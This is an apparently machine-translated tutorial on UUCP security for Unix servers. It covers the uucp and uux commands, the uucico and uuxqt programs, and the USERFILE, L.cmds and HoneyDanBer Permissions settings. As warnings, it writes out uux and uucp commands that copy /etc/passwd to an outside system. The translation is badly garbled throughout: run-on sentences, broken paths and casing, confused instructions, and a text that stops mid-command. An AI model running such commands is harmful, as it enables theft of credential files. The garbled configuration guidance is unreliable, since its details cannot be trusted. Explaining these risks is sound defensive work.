| |
Linux server security
1.UUCP System Overview
UUCP system is a set of procedures to complete the file transfer between commands to perform system maintenance system usage statistics, secure .UUCP is a network utility system UNIX system is the most widely used, in which two reasons: first, UUCP is the only standard network systems of various UNIX versions are available, and the second, UUCP is the cheapest network system requires only one cable to connect the two systems, then you can establish a UUCP. If you need a distance of hundreds or one thousand kilometers away between the two systems transmit data, it required two modems have dialing function.
(1) UUCP command
One is uucp UUCP command, the command is used to transfer files between the two systems, uucp command format similar to the format of the cp command, uucp only allow the user to copy files between systems, the general format of the command is as follows:
uucp source_file destination_file
source_file file system is usually (but not necessarily), destination_file usually a file or directory to another system designated destination_file the format:
system! filename or system! directory.
uucp give system administrators an option to restrict incoming and outgoing uucp file system can only be passed to / usr / spool / uucppublic directory structure. If you tell uucp to transfer files stored in another directory, the system will be sent back a message: remote access to path / file denied uucp allows to simplify the symbol ~ instead of / usr / spool / uucppublic / eg.:
uucp names remote! ~ / john / names
Uucp sometimes used to copy files from another system to the system, as long as the system will be passed in this document designated as the source file (using the system file!), Like this:
uucp remotes! / usr / john / file1 file1
If the remote machine restricts the file transfer directory, the command does not copy files to copy the safest way to file this system is: On both systems to transfer files via uucppublic directory:
uucp remotes! ~ / john / file1 ~ / pat / file1
(2) uux command
uux command can be used to execute commands on another system, a feature called "Remote Command Line Ren." uux most common use is to send messages between systems (mail in its internal execution uux). A typical uux request follows :
pr listing | uux - "! remote1 lp -d pr1"
This command after formatting the file listing, and then connect to the printer system remote1 pr1 print out .uux Options "-" make uux command the standard input device of the input device is established as a standard remote command when several systems. when only one printer is connected to the system, commonly uux print files.
It must of course be strictly limited to the remote command to entertain, to protect the safety of the system, such as:
The system should not allow users to run the following commands on other systems:
uux "yoursys! uucp yoursys! / etc / passwd (outside! ~ / passwd)"
This command will enable the system to send / etc / passwd file on the system outside, in general, only a few commands are allowed to perform .rmail unrestricted mail program, often to allow one command executed by uux also allow rnews (unrestricted netnews pseudo-offline command) on a system running netnews implementation also allows lp running on the system provides a printing apparatus.
(3) uucico program
uucp and uux command does not actually call another system and transfer files and execute commands, but the user's request is queued, and start the uucico program .uucico complete the actual communication work. It calls to other systems, login, transfer data (can be a file or request remote command execution). If the telephone line is busy, or other system has been shut down, the needle transfer request still remain in the queue, uucico subsequent operating functions (usually cron completion) will send the transfer request.
uucico finished sending and receiving data in the system / etc / passwd file, there are other systems uucico to log into the system entry in the entry field, specify the default shell is uucico. Thus, other system calls this system, direct dialogue with the uucico.
(4) uuxqt program
When uucico other system This system calls requesting remote command execution, uucico will this system the request is queued and before exiting, starting uuxqt remote command execution request.
The following example illustrates how data is transferred. Suppose a user of the system sends a message to another remote system remote1 someone, mail will be executed uux, on remote1 system remotely run remail program, messages to be transmitted to the command remail enter .uux transfer request is queued, and then start the actual remote uucico entertain calls and data transmission if remote1 respond to the request, uucico log on to remote1, then sent two files: Mail and uux commands on remote1 performed by uuxqt file .uux command file contains run remail request. If remote1 turned off at the time of transfer, uucico board and will not be able to transfer files, but cron will periodically (1 hour) start uucico.uucico find whether there has not been transferred out data, if found uux transport specified target system is remote1, will try again to call remote1, until transferred through remote1 date, or after a certain number of days have not transferred through remote1, unsent message will be returned to as "undeliverable" mail send the message users.
2.UUCP security issues
UUCP system is not set limits, to allow any user outside the system to execute any command and copy / out uucp user read / write any file in the specific application environment uucp should understand this point, set the protection needed.
In UUCP, there are two procedures to deal with security issues. The first is the uucico program that starts when you call the system with other systems. This program is the system uucp security key, the completion of this system into the file transfer and mass transfer out. the second program is uuxqt, the program for all remote command execution services.
(1) USERFILE file
uucico with the file / usr / lib / uucp / USERFILE determine what the remote system to send or receive documents in the format:
login, sys [c] path_name [path_name ...]
Where login is the system login name, sys is the name of the remote system, c is optional call_back flag, path_name a directory name.
uucico as a login shell, will be the remote system name and location system login name and find the matching login and sys line in USERFILE file. If the line contains call_back flag c, uucico will not transfer files, disconnected, call remote system (that is, any system can tell the system its name is xyz, then the system hang, call the actual xyz perform file transfer), the absence of c, uucico will perform remote system requests file transfer, the file being transferred path_name names are assumed to begin with.
Users need to know the following:
If the remote system using the login name is not listed in USERFILE login domain, uucico will refuse to allow other systems to do anything, and hang.
If the system is not listed in the sys domain name, uucico uses USERFILE have a login name and the first row of empty system name matching, such as: nuucp, / usr / spool / uucppublic applied to all systems as nuucp login .cbuucp, c will force all systems as cbuucp logon requests to perform their own file transfer. If the names do not match the system calls sys system of any one, and no empty entry terms, uucico will refuse to do anything.
If the two machines are set call_back flag, requests the transmission of documents will never be executed, two systems have been calling each other until the two systems when a cancellation call_back to perform file transfer.
If a user's login name is listed in the file USERFILE login domain, when you call the system for the user to transfer files uucico, uucico only transferred to the directory path_name specified file. Empty login name used for all columns not explicitly USERFILE file in the user logged in. so
pat, / usr / pat
Allowing only pat transmission / usr / pat directory structure of the files.
, / Usr / spool / uucppublic / tmp
Others only allow the transfer of the directory / usr / spool / uucppublic and / tmp files in. Do not allow uucico copy the file into / out to the addition to / usr / spool / uucppublic directory any other directory, or some may use the following command to copy important information go of this system:
uucp yoursys! / etc / passwd to-creep
(2) L.cmds file
uuxqt use /usr/lib/uucp/L.cmds file determines the remote execution request command to execute the file format of each line is a command if only uuxqt handle e-mail, the file on the command line only.:
rmail
System administrators can allow users to log on to perform netnews (rnews) command or remote print command (lp), but it must not allow the user to perform copy files to the standard output of the command, such as cat command or a network command uucp, otherwise people just they knock on your system:
uux "yoursys! uucp yoursys! / etc / passwd (outside! ~ / passwd)"
Then you can wait for the system to send a command file.
(3) uucp login
UUCP system requires two login accounts, is a system login account other, and the other is the account management system used. For example, data transmission login account is nuucp, administrative login account is uucp, in the / etc / passwd file should have two lines.
UID and GID of the 5th often left uucp, uucico has managed since the login SUID permission, so nuucp account UID and GID should use other values.
(4) the use of files and directories uucp
/ Usr / lib / uucp for uucp store can not run directly from a variety of users, such as uuxqt and uucico. This directory also contains a number of files uucp determine how such L.cmds and USERFILE. These files can only uucp management account can be written (some system administrators do not want users to change the remote executable command table): according to the safety point of view, this directory system administrator must clear another file is the file contains L.sys can call uucico each entry in the system. data entry item includes uucico system called the phone number, login name, password unencrypted. Needless to say, L.sys should all belong to uucp account management, and should have 400 or 600 access license .
uucp with the / usr / spool / uucp directory for working papers. C. at the beginning of the file name in the file is sent to the other system command file, copy-on other systems / data and execute the command request contains file name with D . C. at the beginning of the file as the file data files. file names X. beginning of the file from the remote execution of requests from other systems, interpreted by uuxqt. filename to TM. is the beginning of the file to transfer data from other systems to this uucp system during the staging file is used .XQTDIR uuxqt for performing file directory X. .LOGFILE uucp can help manage security, which contains information about the success of uucp request execution. the system administrator can always view the document, to understand what the system is to log into the system to perform uucp request? What is the request? in particular to check whether these requests trying to do is not allowed to operate.
3.HONEYDANBER UUCP
There are two main versions of UUCP, the first one with the UNIX System V promulgated together in this section will be referred to the old UUCP, another version called HONEYDANBER UUCP, enacted by AT & T.
HONEYDANBER UUCP UUCP older than a number of improvements:
Dial-up and support for more networks:
Intelligent automatic dial-up modem and a standard AT & T 801 autodialer technology.
Network, such as DATAKIT VCS, UNET / ETHERNET, 3COM / ETHERNET, SYTEK, TCP (BSD UNIX systems).
Connected to LAN dialer.
. X.25 permanent virtual ring (with the X.25 protocol)
Reorganized the / usr / spool / uucp directory in the directory, there is a directory for each remote system.
Enhanced security.
The combination USERFILE and L.cmds files into one file Permissions.
You can specify a remote executable commands on a system level.
. Files can control incoming and outgoing documents.
The default security settings are very strict.
The difference between (1) HONEYDANBER UUCP and UUCP-old
HONEYDANBER in UUCP / usr / lib / uucp / Systems file is a directory in the original UUCP /usr/lib/uucp/L.sys.HONEYDANBER UUCP in /usr/spool/uucp/.log under replaces the old UUCP file /usr/spool/uucp/logFILE./usr/spool/uucp/.log directory uucico, uucp, uux, uuxqt log file containing the appropriate commands in each directory corresponding to the most recent active remote system has a record file (log files are usually stored one week in those directories).
If a call to the system of the remote system is not listed in the Systems file, uucico will not allow any action that the remote system, but boot shell program /usr/lib/uucp/remote.unknown, provided by UUCP the shell program the default version of the logon time /usr/spool/uucp/.Admin/Foreign file a note of the remote system, date and system name. Just make remote.unknown unenforceable, it will be able to prohibit this operation, in order to achieve with the old UUCP compatible.
C., D., X., TM. And other documents stored in a different directory / usr / spool / uucp under the name of the directory on the file name corresponding to the remote system.
In HONEYDANBER UUCP in USERFILE merged with L.cmds files together, the new file / usr / lib / uucp / Permissions provides a more flexible system of granting external access control permission. File defines the rules table can be issued to consult the a variety of systems. the following rules and formatting options.
rule = list option = yes | no option = list ...
Where the rule is the login name or machine name, list is used to separate the rules table (the table with the rule or option and change), it is one of the options below option will be discussed as an option or a table, or just take the yes / no decision to allow / not allow an action.
(2) login rules
LOGNAME rules for controlling as a login shell start uucico.
LOGNAME = nuucp specify the default limit system plus all log on to the account under nuucp: a remote system can only send files to / usr / spool / uucppublic directory of the remote system can not receive any request for documents when uucico calls the remote system.... only when sending the file has been queued to be sent to the remote system. this is the only way to accurately identify uucico remote system (any system can call the system and pretending to be xyz system).. in the name of the remote system uuxqtux executable command is a command default provisions, these default command definitions (usually only rmail, rnews command) is available at compile time colon separated several other systems uucico login account LOGNAME = nuucp:... xuucp: yuucp any rule with a LOGNAME system UUCP delivery to a login request will be rejected (information system will "get lost", and suspend). LOGNAME a rule it is sufficient to start HONEYDANBER UUCP system. in fact, when the system run, put a file in the Permissions option LOGNAME no rule that applies to the / etc / have / usr / lib / uucp / uucico all login shell account passwd file entry in the field. You can use several options to ignore default limit, these options can be combined to allow or restrict various operations such as available WRITE option to specify a directory or file into multiple, rather than be restricted into / usr / spool / uucppublic directory. LOGNAME = nuucp WRITE = / this rule allows files into any directory entry restrictions .2-4 the system remains Note: remote UUCP request may overwrite any files have write permission, you can specify the directory to write multiple files with a colon. separated: LOGNAME = nnuucp WRITE = / usr: / floppy this rule allows the remote system to write files to / usr and / floppy directories with REQUEST = yes option to allow a remote system from the present system to copy files LOGNAME =.. nuucp REQUEST = yes files can be copied files can only be stored in / usr / spool / uucppublic directory, 1, 3, 4 restrictions, entry is still valid. to allow remote system can copy files from other directories, use rEAD select: LOGNAME = nuucp REQUEST = yes rEAD = / usr this rule allows remote systems to copy / usr directory for any other human-readable files can also be specified as a table of contents with the same WRITE option SENDFILES = yes option to allow uucico in. remote system sends a call to the system files have been queued LOGNAME = nuucp SENDFILES = yes 1,2,4 restrict entry is still valid with CALLBACK = yes option to force any designated account to log on to the system call back Note:... CALLBACK = yes not. If the other options listed with this option, other options will be ignored and the combined effect of other options. NOREAD NOWRITE and options can be used separately with READ and WRITE options. table of Contents specified NOREAD option, you can build on rEAD exception handling option (ie pointed rEAD directory can not be requested by the remote system directory), for example: LOGNAME = nuucp, rEQUEST = yes rEAD = / NOREAD = / etc this rule allows remote system requests the system to any other human readable file, but does not include in / etc files, NOWRITE, WRITE joint usage and the similar. Generally, the default limit will not change too much. If this system is transferred to another system or storage system telephone charges there is no way to allocate administrator, you can use SENDFILE option to lift restrictions on some machines, they should build a machine used only for those uucico login account, for example:.. LOGNAME = nuucp SENDFILES = yes LOGNAME = trusted SENDFILES = yes REQUEST = yes READ = / WRITE = / the above rule allows the system to trusted login account has another file in this system access permissions, nuucp account password to be sent to all the present system uucp establish connection management system member, trusted account password can only be sent to the administrator of the trust system. the system has the trust and non-trust account uucp, best create a different account for both public account with PUBDIR option, allows the system administrator to change PUBDIR uucico concept of public directory (the default is / usr / spool / uucppublic), for example:. LOGNAME = nuucp SENDFILES = yes REQUEST = yes \ PUBDIR = / usr / spool / uucppublic / nuucp LOGNAME = trusted SENDFILES = yes REQUEST = yes READ = / WRITE = / \ PUBDIR = / usr / spool / uucppublic / trusted option above to make the files in the directory to the public for different logins nuucp and trusted were placed in different directories. this will prevent the log on to nuucp untrusted system in the public trust system directory and copy into the copy out files (Note: the above option allows nuucp request file transfer). trailing slashes indicate next line down is the continuation of the line with MYNAME option to log on. into account a system endowed with a system name: LOGNAME = Xuucp MYNAME = IOnker
(3) MACHINE MACHINE rule rules for ignoring the default limit, specify a system watches in MACHINE rule, you can change the default so that when uucico calls these systems limit function .READ, WRITE, REQUEST, NOREAD, NOWRITE, PUBDIR options and the same ignores LOGNAME CALLBACK, SENDFILES options, MYNAME defined options must be combined with LOGNAME rule specifies the name assigned to the system call, the name only when the system calls as defined by the rules of the format MACHINE follows: MACHINE = zuul: gozur: enigma wRITE = / rEAD = / this rule allows remote system zuul, gozar, enigma can send / request any other person on this system read / write files generally do not allow the remote system in addition to / usr. / spool / directory read and write files uucppublic other directories outside, therefore, you have to trust the system less MACHINE rules for establishing a system name oTHER MACHINE rules specify that all other users, outside. COMMANDS option for changing uuxqt by remote command execution request default table MACHINE = zuul cOMMANDS = rmail:. rnews: lp above allows the system zuul requests remote execution of commands rmail, rnews, lp.uucico without this option .uuxqt determine what in the name of the system with this option What command execution path PATH.PATH cOMMANDS option specifies the command will use the default settings when editing uuxqt is established usually set to / bin:.. / usr / bin gives the full path name in the cOMMANDS option can be ignored by default PATH MACHINE = zuul cOMMANDS = umail:. / usr / local / bin / rnews: lp Likewise, HONEYDANBER UUCP UUCP should also be as old as the remote system does not allow such orders to run any remote uucp or cat can read and write files. Run may threaten local security. Although the local system to the remote system name to check certain procedures, but any remote system when calling a local system can claim to be "xyz", and the local system is completely believe is really, so that the local system might allow only a zuul run lp command, but in fact any system claiming to be zuul also be allowed to run the lp command. there are two ways you can confirm the identity of the system. One way is to refuse = yes and call the system dialog with CALLBACK. as long as the telephone and Internet lines are not broken or density changes in the local systems will be able to positively confirm the identity of the remote system. another way is by LOGNAME rule VALIDATE option. If you must allow some systems run the command "dangerous" can be combined with cOMMANDS and VALIDATE options, VALIDATE option LOGNAME rules specify that a system must be logged on to the next login account LOGNAME provisions: LOGNAME = trusted VALIDATE = zuul MACHINE = cOMMANDS = rmail: rnews: lp when a remote system is claimed to be when zuul login, uucico will check Permissions file, find LOGNAME = trusted rule VALIDATE = zuul, if the remote system using the login account trusted, uucico will be that the system is indeed zuul continue to under Executive otherwise uucico will be that the system is an impostor, refused to carry out his request. as long as there is only zuul trusted account login password, other systems can not fake it. only when the login password is confidential and not disclosed to other untrusted the system administrator or unsafe system, VALIDATE option can be effective if the login password leakage of the trust system, any system can masquerade as a trusted system is given in ALL COMMANDS option, will allow remote execution of any request command. Therefore, do not use ALL! ALL provision is actually his own account for every user on the remote system.
(4) a combination of rules MACHINE MACHINE and LOGNAME and LOGNAME rule combinations in a row, to ensure a unified security system, regardless of the remote system calls the local system or a remote system calls the local system LOGNAME = trusted MACHINE = zuul.: gozur VALIDATE = zuul: gozur \ REQUEST = yes SENDFILES = yes \ READ = / WRITE = / PUBDIR = / usr / spool / trusted \ COMMANDS = rmail: rnews: lp: daps
(5) uucheck Permissions command Once a file, you can uucheck -v command uucp Learn how to interpret the file. The first few lines of its output is to identify all the files, directories, use the command HONEYDANBER UUCP are present, then the file is Permissions an examination.
(6) a gateway (gateway) can be used to create a mail routing gateway machine .gateway is only a forwarding mail to other systems of systems. With the gateway, so many UNIX systems department or company for all its users to set up only one email the address for all messages sent through the gateway forwarded to the appropriate machine gateway can also be used to enhance security: You can MODEM connected to the gateway, all systems by the gateway to route mail through the LAN or wired communication line and gateway communication all of them. local telephone number system, uucp login account, password can not be published for the group outside the local system system, if necessary, make the gateway is the only system that is connected to MODEM establish a simple gateway is easy.: for each log into the system, users want to route mail, just put a line in the file / usr / mail / login in: forward to system login account login message to be sent to enter the gateway, will be forwarded to the login system! the user's account login system under two different logins can be a gateway to establish a safety management levels:. gateway password must not be guessed, gateway should be possible only transfer mailed at least not without doing anything else. the important data stored in the machine on the gateway should be done daily routine security checks, and for uucp login to carefully check the gateway also provides an entry for the bad guys: if someone illegally entered the gateway, he will other local access systems and access via the communication line using uucp systems file contains other information about the local system uucp when this man attempted illegal entry into other systems, this information will be of great use his experience: to establish a gateway, it should be possible to ensure impeccable. uucp connection can be established between the gateway and the local system, so that the local system regularly get mail and gateway communication, and the gateway is no need to call the local system. This at least to prevent a bad guy through the gateway into the local system illegally. with local system Permissions file to restrict the gateway behavior to the bare minimum level, that is, only forward the message. This allows the eavesdropper can not obtain the use of gateway other file systems.
(7) Log File Checker HONEYDANBER UUCP login information will automatically be emailed to uucp.login document should regularly read the file. The system administrator should check that the large number of unsuccessful requests, particularly other systems of this file system requests. Also to check do not allow remote command execution request. login information is stored in a file, if you want to view, use the grep command to view ./usr/spool/uucp/.Log/uucico/system file contains uucico login, / usr / spool / uucp / .Log / uuxqt / system file contains the following line uuxqt login command will print out all commands executed uuxqt (except rmail):. grep -v rmail /usr/spool/uucp/.Log/uuxqt/* following line command will print all of the system files to remote requests: grep -v rEMOTE /usr/spool/uucp/.Log/uucico/* | grep " |
|
|
|